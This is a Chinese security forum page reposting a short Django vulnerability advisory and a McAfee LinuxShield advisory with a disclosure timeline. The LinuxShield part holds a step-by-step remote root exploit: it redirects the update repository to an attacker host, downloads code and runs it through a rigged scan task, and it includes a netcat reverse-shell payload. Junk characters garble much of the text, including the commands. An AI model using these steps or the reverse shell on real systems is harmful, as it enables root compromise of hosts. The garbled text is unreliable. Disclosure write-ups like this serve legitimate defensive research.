最近看过此主题的会员

返回列表 发帖
Django开发框架多个安全漏洞
发布时间: 2011-09-12
4 |" g/ i) f9 d6 [
影响版本:
. t- f8 j. B6 r; z+ ?+ Z! H, @Django 1.2.56 v7 X9 B/ l! O8 F5 y: E
Django 1.3 beta 1$ _9 K4 a' o* e  P" Q
Django 1.2.41 v+ c) Y1 z( T+ {" E! ^
Django 1.2.29 S* n6 Q: F- a# o
Django 1.2
  i( z# Q3 z" _5 p! q! D
漏洞描述:
: X4 A- {) E0 T, u' k5 D+ B  o
Django是一款开放源代码的Web应用框架,由Python写成。
3 ~6 g$ r0 l0 E( U. k" w# rDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
0 U% a3 }4 {" H' C1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
5 o# a7 @' A' @" ~1 U3 g+ t2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
* Z9 p% `; ^$ ~; T3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
8 }3 f2 B$ y6 r8 h, `; |4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
1 I" p, a8 J( d& q0 O5 h
细节参考:
7 G5 o' z4 n6 S! \https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/4 f2 A; _$ [3 o
http://secunia.com/advisories/45939/
! T9 e6 {7 w$ s* ^" a
5 {7 A* q6 @, ?6 \! l3 [0 I

" i- h' B6 }/ U/ F! c" n: N# x: q; N! x/ G( u% n" J

! w1 F) f) B" ^7 ]( A. x4 z4 W0 @: ]8 e) T3 K0 \  T2 o

$ _9 m* Q( _9 g% l0 L  ~. v& k0 e0 g* ~2 y; b( r$ h
% K: `8 }, H6 C- P7 ~
. x$ u, U% J# {$ K% b

; F6 x; d9 Z& `' V
0 N3 ~* M5 h" P3 d2 ~% F( _' H/ K0 U
5 i" B; _3 o# d- o& n9 P- x2 \" c' Y

# j2 O% |6 a! r8 B; _  l6 _* f; D6 V; B3 x( x

' s3 A" g, A6 K- E
7 x. X! _0 D% T0 O4 G* @( ]) p3 g7 K/ t
" M5 i! f7 e; @* W* b# N) q
公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

McAfee LinuxShield 本地/远程代码执行漏洞
McAfee LinuxShield remote/local code
1 \/ y* E  g5 a( |' F3 z8 i# f影响版本: McAfee LinuxShield <= 1.5.11 N+ B+ e- `( f  c9 l
远程攻击: Yes
3 G% ?  B3 N4 f  f本地溢出: Yes; {6 M" d" x9 `5 v8 ^( b5 A
背景阅读:8 ?" G. w) c/ }. d( N" C! s
===========
( B* ^0 M' H8 W* I) @9 t
5 T+ J$ y6 f* C2 `; {! @, [LinuxShield detects and removes viruses and other potentially unwanted# o5 {! C$ F4 Y, t# }+ ~
software on Linux-based systems. LinuxShield uses the powerful McAfee
  B6 z! N! }" ^* x6 ~scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our6 n" k" H5 F- _5 b* o2 r
anti-virus products.
5 q6 j  _" S) R! x5 s. F" o' {1 O. t' j+ ]
Although a few years ago, the Linux operating system was considered a
2 \0 |2 q2 ]; {0 _6 Fsecure environment, it is now seeing more occurrences of software
7 k4 ]% a1 z/ t* A- S  `' Q0 r2 I/ S8 `specifically written to attack or exploit security weaknesses in
; N/ ]4 W' u! i0 v# Y! ~Linux-based systems. Increasingly, Linux-based systems interact with! F6 L4 R4 h  {/ X5 D0 q% W
Windows-based computers. Although viruses written to attack Windows-
% B7 O9 K( ]/ bbased systems do not directly attack Linux systems, a Linux server
) `1 z' @& b: ?1 |' m0 }" A, {can harbor these viruses, ready to infect any client that connects to
# i+ n. A; M) T9 Rit.' e- Y5 A5 l( D9 \" a+ G+ k8 I; G
% \- z5 J4 q# ~# ^# x
When installed on your Linux systems, LinuxShield provides protection6 u1 B" l  Y2 X1 \  I8 C4 }
against viruses, Trojan horses, and other types of potentially" D5 S! A% r, v+ r
unwanted software.
" Z% o( o6 ~2 V! X- I% V8 O5 b1 N; v, i, _- f& a  i
LinuxShield scans files as they are opened and closed
4 {* z- o& \# I, _; z1 ?* s?&amp;#65533;&amp;#65533; a technique$ f; d% X' k& l, t0 B' n$ \
known as on-access scanning. LinuxShield also incorporates an
. x: a7 J* \# [& f$ v# S+ R0 son-demand scanner that enables you to scan any directory or file in$ _) s) X# D. e+ t2 n" z
your host at any time.
1 R: G& X5 z3 g1 g
5 l( ?5 R9 f0 \  yWhen kept up-to-date with the latest virus-definition (DAT) files," x" v, [: b, w! L) U% G" T5 F
LinuxShield is an important part of your network security. We
. A; B" l/ r# M7 w( t9 Qrecommend that you set up an anti-virus security policy for your0 _  U. e7 ]* z7 |5 n' V) [
network, incorporating as many protective measures as possible.
$ [/ f( F( h! W2 f7 l* D, C6 x& K/ {4 Y# x# q- a
LinuxShield uses a web-browser interface, and a large number of! l! P! j; p1 ?+ l7 x0 w, ~
LinuxShield installations can be centrally controlled by ePolicy  {- j- g* G" b/ g
Orchestrator.3 d( ]7 ~& J+ `- F: n+ V
& R1 }% U5 y. y% o
(Product description from LinuxShield Product Guide)
  o1 _# A- J: h! Y' K# Z
1 C+ F" M) d9 n2 f: c' M
# M" P+ O8 j4 D: W, |" Z
; G" P2 [6 |/ o" ~/ ODescription:7 s3 a7 z% E" t* ?
============
3 N6 f0 s: _* L* `$ z( g: c1 M% `: r2 T+ [; A+ B/ y' X
This vulnerability allows remote attackers to execute arbitrary code3 Q9 Q( i0 j" j; i$ r! G. S* u
on vulnerable installations of McAfee LinuxShield. User interaction3 }1 N9 y) I9 n
is not required to exploit this vulnerability but an attacker must
: _: O" x7 P: Zbe authenticated.
+ J: Z8 N/ Y9 Z* p
5 F% F, v- i# \; m$ i1 {The LinuxShield Webinterface communicates with the localy installed
6 k. _  Z; P& j" {) r"nailsd" daemon, which listens on port 65443/tcp, to do
. r# H7 Y2 A8 l! wconfiguration
" L& u$ B2 A+ t  s/ w2 [) t5 }0 Vchanges, query the configuration and execute tasks.
6 A3 r+ E- t8 K3 a( b( A
/ J& z+ i% s' W# l2 l( REach user, which can login to the victim box, can also authenticate
, ^" W  }) n  L! t4 U4 nit self to the "nailsd" and can do configuration changes and
9 e# q7 x1 G6 Texecute
, e. E4 M5 a3 A& l9 S: ?( ktasks with root privileges.# I0 g! w+ b5 d% D% k) f
+ r* T, }' _- c$ U8 e; m. [( o3 z
A direct execution of commands is not possible, but it is possible to
  y" ]  [3 t0 ddownload and execute code through manipulation of the config and% C/ N( t  ~) [0 T$ w
execute schedule tasks of the LinuxShield.
, u6 q& E$ W- }9 v' D
$ e, Y2 K3 t& F7 C- h' i" V0 H5 s6 v8 i6 {5 N
walk-through (after the TLS handshake):* I7 q. @% W9 y/ ~( K) a
+--------------------------------------: X+ C8 n8 X% Q  }$ i4 Y
+ x  F& T/ }! |" _* a9 y
nailsd > +OK welcome to the NAILS Statistics Service
* e0 k' A- @+ G, S+ iattacker> auth <user> <pass>
; v0 m" a3 s0 R7 wnailsd > +OK successful authentication2 r2 u# w) q: `) P

! N% L0 q3 P! s6 a2 d2 g# Set the Attacker repository to download our code from a httpd
7 S% n1 w" n& s# (catalog.z)
" w+ G. p9 [: Z' q. K#---------------------------------------------------------------1 O) a0 t# u  T2 C# R
attacker> db set 1 _table=repository status=1 siteList=<?xml version' f$ A, q; U; h4 C& f! M
="1.0" encoding="UTF-8"?><ns:SiteLists. d: D2 f. c* r7 s& [$ C" K5 j3 I$ _
xmlns:ns="naSiteLi9 `9 J4 N. F' Z. P
st" GlobalVersion="20030131003110"$ o. O' P3 o5 @+ R) u  Q
LocalVersion="20091209
, I6 j3 ^+ G4 Y: s; c% H+ D161903" Type="Client"><SiteList) g" Q* T5 D! `8 f
Default="1" Name="SomeGU3 S# h% t* O! A# ~4 g# g
ID"><HttpSite Type="repository"
# n  p( ?+ A' h' Z& B" H* tName="EvilRepo" Order="1
" _  W8 W+ N0 K( v4 B# y" Server="<attackerhost>:80"4 Z2 i  W8 C' _+ W
Enabled="1" Local="1"><Rela% K3 r9 Y' d( i" c& Q1 b2 c2 U* C
/ U* C# ~+ `- d8 j% V7 _
tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use) T7 D3 O# y& t
rName></
5 ~+ e4 N8 |7 \% mUserName><Password6 t- M; z' u) B  q" p) h! [
Encrypted="0"/></HttpSite></SiteList></
- R0 |3 C0 B. Vns:SiteLists> _cmd=update+ W/ {+ ~$ W  ^/ B! s
nailsd > +OK database changes buffered.: n% j, C  V( j1 V

0 I9 r( e) U, d# Execute task to set the attacker repository
; T; {. G+ V# K- `4 U#---------------------------------------------------------------3 w3 C  J: S% S/ u4 T( ~
attacker> task setsitelist( o) Z" d. K- I( Q! }! D, E# I1 X
nailsd > +OK setting sitelist from CMA.  ^% Q2 l- |- s- Q
% J* s/ X+ w; v( Q6 R
# Execute the default Update task to download the code
8 Y; v- F2 k% a4 i% t#---------------------------------------------------------------
* n3 L" w! H: B2 Y" Xattacker> task nstart LinuxShield Update: e4 N6 f& k( f; ]' X! Z0 D9 k
nailsd > +OK task LinuxShield Update starting
( Z! @% R" f+ i* Q" S% U8 O6 t" k2 z  R) J
# Create a Scan profile, which executes our code. The profiles are3 _. ]# J+ I  H* c# S( |+ [
# not stored in the database." I* s' ^  C9 t( V7 K. l
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
2 X& m3 ~3 ^) k! J* v: B/ v/ D1 F#---------------------------------------------------------------
2 C4 T% D' I: S- J& i/ `attacker> sconf ODS_99 begin
/ f- E, g4 l( c3 d3 k( snailsd > +OK 1260400888! k+ N! c$ ]/ C9 X2 j( H
7 H. }2 T  `' t7 I, b9 j
# Set the variable "nailsd.profile.ODS_99.scannerPath" to the
. n4 _0 T6 v6 A/ R& @path
- i9 }7 w( ]% h* M9 P5 S* V# where our earlier downloaded catalog.z file is stored.
6 m/ l+ y9 i( b1 D1 c# T) ^# (/opt/McAfee/cma/scratch/update/catalog.z)
) P& h- Z/ P6 N/ O% z#---------------------------------------------------------------
& x4 `2 y4 t1 M# f7 O" [' Gattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=$ @! ^9 p3 O* W2 o
true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
5 F' K" {7 @" [) Q+ ~$ q/ `" FDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=" E+ `1 d2 r# R+ [6 Y( X+ N
10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng3 F3 ^+ _; e5 x  F8 v7 I& P- x
ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro" n$ d- l" [4 s5 G2 H8 n* H% y
file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD  ^$ }% a. v. n! }* i' m
ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en& W9 D# }; h% }* @# d
ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd. c! P6 G( Q, n  m+ V
.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
% i0 I- {5 m, wristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru( Z0 E% j; P5 U9 k# t) L/ z5 g
e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
9 k3 k: J$ t. [7 V8 ~2 \.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
- G0 m3 h+ h7 [) Vle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
% u- l6 L  d3 W6 }( Adren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
  M3 r* x: @1 Y5 `! v. |. ye nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
6 B, v& \+ F. z3 \  j. \ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm4 Q: h* Z6 y, I# K. S
o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile% f+ N( O4 h. G: P. [
.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t( l1 C% T2 \. ?! q0 o$ P
rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat- V, Q* c$ ~' a' x  W+ X
ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
, l4 r  {1 _7 f( J% a1 f00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
- B, {( |+ O% K3 X' j& ]+ l: OODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
% ^6 U6 S, ~/ q( x! l3 @) o# zter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
3 n% W/ ~  |! j8 J; Vnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
. b: U% U, b/ n4 |% H0 e; t  Jofile.ODS_99.filter.extensions.type=extension nailsd.profil/ p. t' g; h; a# Q
e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99, p% t6 C$ a1 z# Y5 c- F! Y
.action.Default.secondary=Quarantine nailsd.profile.ODS_99.; E! n5 F8 g4 t# W( E
action.App.primary=Clean nailsd.profile.ODS_99.action.App.s, z7 |5 ]5 t3 O5 g: b" @
econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa1 y  }' e  @) |/ d( I8 p
ss nailsd.profile.ODS_99.action.error=Block
% z/ I) M* y$ y! cnailsd > +OK configuration changes buffered/ [; _4 m# m0 N* U  d
attacker> sconf ODS_99 commit 1260400888
, W6 _6 b4 {+ F/ W& y8 b1 Jnailsd > +OK configuration changes stored
6 ~: w% k" h% |" v% {) B
5 i# `+ x0 T5 n/ @# Set a scan task with the manipulated profile to execute the code. O0 u9 P1 D+ x. U$ j3 D
#---------------------------------------------------------------, D% Z9 m. i7 O/ C
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
! s- t. w+ j1 A4 i+ _pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
& ]  u8 e- |# d5 qmp;exclude:false timetable=type=unscheduled taskResults=0 i8 c: \; r/ c: n* i) \
_lastRun=1260318482 status=Stopped _cmd=insert
4 ~+ h% f* T  l5 ]1 R7 Dnailsd > +OK database changes buffered' z: T9 l! E9 g0 R1 K

+ X* K& a1 g8 F  N. }; L* \# Execute scan task to execute the code
4 K" i+ b4 R- g' N, I% ]#---------------------------------------------------------------
4 e" H% s. Y% ]  g3 ]! jattacker> task nstart Evil Task  a. P" [; e9 S( q' @
) O, H3 j& t# h4 X( m' v5 O6 R
+-------------------------------------- walk-through EOF* k. v8 t/ }/ f# V0 T( e5 _# E+ E
6 p6 J; Z+ ^4 T, t: U9 @: k
% d( ?" [; K1 V: J. e; W4 u1 a
To get a reverse root shell place something like this in the catalog.z% I+ W; e6 @- F# q7 H" F: B* x+ V
  J: K1 W* \8 N% g
--- snip ---: }& {( U4 {- ^4 y
#!/bin/sh1 P, b( P& l2 ?6 J+ S
nc -nv <attacker_host> 4444 -e /bin/sh
8 k: T  p; q5 N" e( k8 z) g--- /snip ---
  W) I$ q6 n+ n' d2 d8 o) T8 f% F! m
7 ]/ I* z" ]& e: Y9 |

5 u0 c  s8 p4 r) L0 e5 s+ q/ tProof of Concept :
- o0 {8 s) z0 y5 J5 s& W==================! m4 |! }& p  g
4 n) z) w7 q6 K
http://inj3ct0r.com/sploits/11165.tar.gz
" t  T# q/ I) _. E. S8 r' z
5 q7 `' X' a$ J  [7 r$ D8 H: m- w# |. I$ f, A+ i2 N/ D) f

" y2 X* L. k8 `) w5 QSolution:! p+ [9 C% I; k+ X2 H. p% B9 n/ E
=========. {  y2 g" s. {% I: M3 k& e; q
$ w5 L$ Q: M6 e) Q; d0 {
McAfee Advisory- w  u% r& t& F- p% n) T& q, O% [& L
+--------------# B$ s( _$ {/ t) W# p. _% F
https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
" [7 Q" s/ g' C7 D- @  l, {7 ]5 ^: v& c- E$ p0 Z1 ~
* `* T& v5 B9 h9 p
9 {6 a1 V/ p' o( F0 l) q
Disclosure Timeline (YYYY/MM/DD):4 M4 C9 _" v1 y6 t( \# O
=================================4 e0 i& n! |6 k+ R7 t  r) b! c
* Y  o; ]5 ?, N% K3 H4 f: A5 b
2009.12.07: Vulnerability found% o5 K3 W0 T8 H" R; a0 n, D! J; w
2010.02.03: Asked vendor for a PGP key$ `2 S# z3 d# I
2010.02.05: Vendor sent his PGP key( [  m! Y& O% E% E
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
, J5 ~# {7 ~) Odate (2010.02.18) to Vendor
8 P( F! K/ M9 y5 w8 |2010.02.05: Vendor acknowledges the reception of the advisory
4 i3 R  e' Y- r+ z/ }% H2010.02.16: Ask for a status update, because the planned release date is
6 a8 J5 F) B/ q( [1 i* w. H+ {* D2010.02.18.9 K9 ?8 U) m& {
2010.02.16: Vendor response that, they are currently working on a patch9 Y; @4 \' {# j: k* [) |* b" T2 V
2010.02.17: Changed release date to 2010.02.25.; R% G! _4 a* J
2010.02.22: Vendor gives a status update, that they are able to release: Q9 x8 _5 X( z6 t% j' }% i7 J
the patch on 2010.02.25.
6 Z5 ]3 {2 a% O/ r. P) S2010.02.24: Ask for a list of affected products and the advisory url.
, b1 g( }8 j6 Y3 Z9 J1 }! O9 E( S* s2010.02.24: Vendor sends the list.$ B9 u. g4 v1 H7 c; v
2010.03.02: Release of this Advisory
1 j6 V) m- j! T% c+ j& G- Q1 y1 P( y" \$ F

4 \4 D" ~& }; M2 ~/ {
, {) N8 ?! a5 o3 X# l  N' f" W3 O6 B& n0 L

# V% b7 I( ]5 I. j$ ^3 c
: c2 ^$ X3 `% I6 v2 I) E0 L& g. \
# F" a0 g) w3 N( `) |: O$ M

( Y- |  U2 D( W9 _2 _* f2 M& r* I1 k. f7 F7 ]

8 c' L* e& |1 A1 X$ m6 v, ?) |& m/ P
# l8 D" X, F8 y8 H6 s8 A0 A
6 d( ?4 l5 H0 a& @. `# s

& r7 ?- O( ~1 X7 g7 n# [* p& s, ~2 P5 c
5 k- B: J' G' T3 E! Q
7 P' ~' ^! l7 ^; S9 N- [' j

+ l& G2 u& N1 S4 |9 Y3 w  W2 e2 O" H7 s0 F5 M) P  I

1 Q+ O( R1 J* a. \2 ?# s# ?公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表